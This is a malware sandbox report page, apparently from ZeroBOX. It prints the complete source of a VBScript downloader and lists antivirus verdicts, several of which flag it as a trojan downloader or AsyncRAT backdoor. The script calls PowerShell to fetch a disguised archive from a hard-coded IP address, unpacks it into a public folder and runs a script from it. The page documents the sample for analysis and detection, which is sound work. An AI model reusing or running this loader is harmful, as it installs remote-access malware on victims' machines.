Static | ZeroBOX
No static analysis available.
Dim xxxxxx, Hmmdrtu, Style, Wait
Set xxxxxx = CreateObject("WScript.Shell")
Hmmdrtu = "powershell.exe -NoLogo -NoProfile -Command ""Start-BitsTransfer -Source 'http://38.22.104.227:666/tnttawy.jpg' -Destination 'C:\Users\Public\bbbb.zip'; Expand-Archive -Path 'C:\Users\Public\bbbb.zip' -DestinationPath 'C:\Users\Public\'"""
Style = 0
Wait = True
xxxxxx.Run Hmmdrtu, Style, Wait
WScript.Sleep 4000
Dim filePath, parameter
filePath = "C:\Users\Public\Auto.vbs"
parameter = ""
xxxxxx.Run """" & filePath & """ """ & parameter & """"
Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Trojan.GenericKD.73157996
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Cybereason Clean
Baidu Clean
VirIT Clean
Symantec Scr.Malcode!gen
ESET-NOD32 VBS/TrojanDownloader.Agent.ZNO
TrendMicro-HouseCall Backdoor.VBS.ASYNCRAT.YXEFRZ
Avast Script:SNH-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan-Downloader.Script.Generic
BitDefender Trojan.GenericKD.73157996
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Trojan.GenericKD.73157996
Tencent Vbs.Trojan-Downloader.Der.Osmw
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Trojan.GenericKD.73157996
TrendMicro Backdoor.VBS.ASYNCRAT.YXEFRZ
FireEye Trojan.GenericKD.73157996
Emsisoft Trojan.GenericKD.73157996 (B)
GData Trojan.GenericKD.73157996
Jiangmin Clean
Varist Clean
Avira Clean
MAX malware (ai score=88)
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Generic.D45C4D6C
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan-Downloader.Script.Generic
Microsoft Trojan:Script/Wacatac.B!ml
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:Wr4kcWn837J)
Yandex Clean
Ikarus Trojan-Downloader.VBS.Agent
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG Script:SNH-gen [Trj]
Panda Clean
CrowdStrike Clean
alibabacloud Trojan[downloader]:Win/Generic.Gen
No IRMA results available.